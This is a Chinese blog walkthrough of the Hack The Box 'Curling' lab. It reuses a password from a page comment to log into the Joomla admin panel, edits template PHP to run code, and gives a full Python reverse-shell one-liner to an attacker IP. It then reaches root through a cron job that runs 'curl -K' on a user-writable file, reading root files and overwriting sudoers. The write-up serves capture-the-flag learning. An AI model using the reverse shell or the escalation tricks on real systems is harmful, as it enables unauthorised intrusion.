HTB-Curling

2023-12-17 05:10
文章标签 htb curling

本文主要是介绍HTB-Curling,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述

HTB-Curling

  • 信息收集
  • 开机
  • 提权

信息收集

目录扫描
在这里插入图片描述

nmap
在这里插入图片描述

  • http 80
  • ssh 22

看到这么多内容,要耐心的收集可能有用的信息。
在这里插入图片描述
在这里插入图片描述

这个界面收集到的信息整理一下

  • Super User 可能是 Floris
  • 登录功能可能存在弱密码登录或sql注入

继续收集信息
在这里插入图片描述
2022 Cewl Curling site
查看源码发现一个注释
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

收集的信息

  • Super User 可能是 Floris
  • 登录功能可能存在弱密码登录或sql注入
  • 2022 Cewl Curling site
  • 未知信息:Curling2018!

再去看看那个登录功能,可以看到我尝试了很多种凭证,均以失败告终。
在这里插入图片描述
那这个Curling2018!!和疑似超级用户的Floris可以用在什么地方呢,还有一个ssh,但是尝试后发现不行。还有其他地方么,还有一个administrator目录
在这里插入图片描述
在这里插入图片描述
也做了多次尝试最终发现Floris:Curling2018!可以登录
在这里插入图片描述

开机

进到主页以后,个人认为应该是找能配合上传漏洞的功能或者类似于RCE的功能,看到有模板,进去看看。

在这里插入图片描述
在这里插入图片描述
有两个模板,先来测试测试这两个模板的使用情况
在这里插入图片描述
试探性的分别在Beez3模板和protostatindex.php模板文件上添加一句echo
在这里插入图片描述
经过测试此网站目前使用的是protostar模板
在这里插入图片描述
可以在index.php做手脚,这样比较麻烦每次都要重新保存。
在这里插入图片描述
换成这样就可以了
在这里插入图片描述
经过测试发现目标装有python
在这里插入图片描述
开个终端监听1234端口,

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.42",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

提权

然后就可以准备下一步了,可以看到我们没有红色框线内的文件的任意权限。
在这里插入图片描述
当然,最吸引人的就是password_backup这个文件了,看到这我盲猜应该是ssh的私钥。
在这里插入图片描述
想用python -m http.server 80开一个简易FTP但是行不通,正好这两台电脑在局域网内,可以用nc传输。

发送方: nc -l 端口 < 文件 -l就是listen监听
接收方:nc ip 端口 > 文件
先在发送方执行,后接受方执行。可以把>左边大的地方看成门的入口,尖尖是出口,发送方就是文件从入口进从监听的端口出去,而建立连接后文件从ip 端口出来到文件去(这个文件可以随便改名)。

在这里插入图片描述
很遗憾猜测错了,不是ssh私钥,去查查文件头呢。
在这里插入图片描述
在Static-AJ博主的一篇文章中找到了,非常感谢这位博主。

在这里插入图片描述
使用xxd -r

在这里插入图片描述
解压的时候又出现问题,结果一看又是包中包中包,先手动解压几次如果超过就写脚本解压。
在这里插入图片描述

经过tar解压的时候遇到问题了

在这里插入图片描述
因为我加了-z
在这里插入图片描述
password.txt里面装的这个5d<wdCbdZu)|hChXll,试试这个密码是不是floris用户的密码
在这里插入图片描述

尝试之后成功切换到floris用户
在这里插入图片描述
这时候就可以去神秘的admin-area一探究竟了。
在这里插入图片描述
input里面装的
在这里插入图片描述
report装了一大堆,不过好像就是首页。
在这里插入图片描述
用diff对比一下只有一些因为环境变量不同而改变的。
在这里插入图片描述
再去看看sudo -l
在这里插入图片描述
看样子线索断了,无意间看到这两个文件的时间。
在这里插入图片描述
去看看crontab,又没有收获。
在这里插入图片描述
但是我们可以去监视与这两个文件有关系的进程,借助稀烂的基础写了个循环。

while true;do ps auxwww | grep input;done

在这里插入图片描述

/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
/bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

curl -K,意思就是会从读取文件里面的内容作为参数
在这里插入图片描述
因为input里面是127.0.0.1所以curl结果就是我们能访问的网页首页,然后把curl结果输出到同目录下的report里。
在这里插入图片描述
有个想法,先找到root.txt位置然后直接curl它让它输出在report里面,啊当然,root.txt在/root/里面,先看看url怎么访问一个文件。
在这里插入图片描述
在这里插入图片描述
但是我这貌似不行,突然发现root前面少个/。
在这里插入图片描述
那怎么拿到root权限呢,既然能通过input调取我们想要的,就用input调ssh私钥。
ssh安装的时候就会在/etc/ssh/生成一个ssh_host_rsa_key 私钥。
在这里插入图片描述
然后用私钥连接居然还要密码,是不是目标ssh配置文件关闭了私钥登录root。在这里插入图片描述
看来禁止了root登录。
在这里插入图片描述
可以想办法修改一下sudoer呢,先去看看sudoer文件。
在这里插入图片描述
测试发现使用两个-o参数只会warning而且只有第一个-o参数有效,那就去试试。

在这里插入图片描述
啊哦,看起来不能这样用,难不成不能放在一行。
在这里插入图片描述
查看curl手册发现-K参数的config文件每个物理行仅写入一个选项。
在这里插入图片描述

分为两行尝试
在这里插入图片描述
然后就root了。

在这里插入图片描述
在这里插入图片描述

这篇关于HTB-Curling的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/503167

相关文章

HTB-You know 0xDiablos

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看
阅读更多...
HTB-bike(SSTI模版注入)

HTB-bike(SSTI模版注入)

前言 大家好,我是qmx_07,今天给大家讲解bike靶场 渗透过程 信息搜集 服务器开放了 22 ssh 和 http80端口 Wappalyzer 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等 服务器所使用Express框架 发现SSTI模版注入 可以看到这个输入框,用来输出 内容尝试x
阅读更多...
HTB-lgnition(curl工具、yakit、 弱口令)

HTB-lgnition(curl工具、yakit、 弱口令)

前言 各位师傅大家好,我是qmx_07,今天来讲解lgnition靶机 渗透流程 信息搜集 服务器开放了80 http端口 curl工具 介绍:curl工具是一个用于发送HTTP请求的命令行工具。它支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,并且支持各种常见的操作,如GET、POST、PUT、DELETE等。 -v显示输出与请求和响应相关的详细信息,包括请求头
阅读更多...
HTB-Crocodile(FTP和web综合利用)

HTB-Crocodile(FTP和web综合利用)

前言 各位师傅大家好,今天给大家讲解Crocodile靶机 渗透过程 信息搜集 服务器开放了21FTP和80HTTP服务思路:可以尝试 匿名登录FTP 或者 尝试WEB登录后台 FTP匿名登录 通过anonymous 匿名登录到FTP服务器allowed.userlist 和 allowed.usserlist.pass 分别是 账户和密码 Web目录爆破 服务器有
阅读更多...
HTB-Mongod(MongoDb数据库)

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca
阅读更多...
HTB-Redeemer(redis)

HTB-Redeemer(redis)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Redeemer这台机器,主要是对redis组件进行渗透,了解思路 渗透过程 更改一下 目录结构,先写 渗透过程,再写 题解 信息搜集 通过nmap扫描 发现开启了6379 redis服务,尝试连接注意:nmap 扫描 可以先确定端口开放情况,在进行系统版本扫描,这样会快一些 连接redis数据库 使用redis-cl
阅读更多...
入门三.HTB--Dancing(6.18)

入门三.HTB--Dancing(6.18)

大佬 https://www.cnblogs.com/Hekeats-L/p/16535920.html 任务1 SMB 即Server Message Block(服务器消息块),是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用你的手机、iPad或是另一台电脑来访问A电脑上的该文件时,你可能需要用到SMB共享。 任务2 SMB端口服务 nmap -sV
阅读更多...
htb_Freelancer

htb_Freelancer

端口扫描 80 88 389 445 扫描ldap协议相关漏洞,没有发现 扫描子域名,加入/etc/hosts(后面发现没用) 枚举域用户 目录扫描,发现一个/admin目录 访问后发现要账号密码 访问80端口,注册一个freelancer用户 查看Blog,底部评论区可看见有用户 点击用户查看,发现修改url中的数字可以查看不同用户 当url为http://freel
阅读更多...
POJ3009 Curling 2.0【DFS】

POJ3009 Curling 2.0【DFS】

题目链接: http://poj.org/problem?id=3009 题目大意: 一种在宽为M高为N大小的矩阵上玩的冰壶游戏,起点字符为'2',终点字符为'3',矩阵上'0'为可移动区域, '1'为石头区域。冰壶刚开始是静止的,每走一步都会选择某个方向运动,而且会沿着该方向一直运动不停, 也不会改变方向,除非冰壶碰到石头或者到达终点,才会停下(这算一步)。冰壶在运动的时候,不
阅读更多...
POJ 3009 Curling 2.0 (DFS)

POJ 3009 Curling 2.0 (DFS)

题目链接:http://poj.org/problem?id=3009 题意:类似冰壶比赛。在一个矩阵中有一个起点一个终点,有空地和障碍物。从起点开始可以使冰壶朝一个方向运动(如果该方向没有障碍物的话)直到撞到障碍或者飞出边界或者到达终点,飞出边界游戏失败,撞到障碍障碍消失,冰壶停在障碍前,可以使得冰壶再次运动,问能不能在十次(包括)操作之内使得冰壶到达终点,不能则输出-1。能则输出最少的操作次
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2